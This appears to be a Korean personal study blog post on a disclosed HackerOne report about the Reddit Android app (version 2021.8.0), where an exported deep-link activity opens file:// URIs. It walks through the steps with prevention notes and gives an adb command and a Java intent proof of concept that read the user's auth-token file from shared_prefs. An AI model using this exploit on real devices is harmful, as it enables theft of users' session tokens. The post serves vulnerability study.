EYEN
안드로이드 CVE 스터디-information Disclosure 본문
#1 대상 cve report
Reddit disclosed on HackerOne: Third party app could steal access...
hackerone.com
#2 cve 개요
app name: reddit
version: 2021.8.0
OS: Android 11
#3 POC 절차
또 딥링크!
1) 외부에서 접근 가능한 액티비티 찾기 (예방: exported: false)
intent 중 data http://www.redit.com을 사용하는 등 Url 사용하는 것을 확인할 수 있음
2) 그 안에서 인앱브라우저에 접속하는 코드 찾기 (예방: X)
data를 가져와서 처리하는 부분
3) 인앱 브라우저 링크 대신 file:///data/data/.../shared_prefs/사용자 토큰 내용.xml (예방법: file 로 시작하는 링크 제어)
adb shell am start -n "com.reddit.frontpage/com.reddit.frontpage.RedditDeepLinkActivity" -d "file:///data/data/com.reddit.frontpage/shared_prefs/com.reddit.auth_active.Strong-Sun628.xml"
4) POC 코드
Intent intent = new Intent();
intent.setClassName("com.reddit.frontpage", "com.reddit.frontpage.RedditDeepLinkActivity");
intent.setData(Uri.parse("file:///data/data/com.reddit.frontpage/shared_prefs/com.reddit.auth_active.UserName.xml"));
startActivity(intent);
#4 참고 자료
학식 - 정보보안 전문 블로그 :: [AOS 취약점 진단] 10강 - 취약한 액티비티 컴포넌트 점검 (tistory.com)
'자기주도학습 > CVE 공부' 카테고리의 다른 글
CVE-2023-21716 Microsoft Word 원격 코드 실행 취약점 (0) | 2024.10.08 |
---|---|
윈도우 기본 프로그램 케이스 스터디 (0) | 2024.10.04 |
안드로이드 CVE 스터디- improper Authentication (0) | 2024.05.15 |
안드로이드 CVE 스터디-XSS in Webview (0) | 2024.05.14 |
안드로이드 CVE 스터디-Insecure storage of information (0) | 2024.05.13 |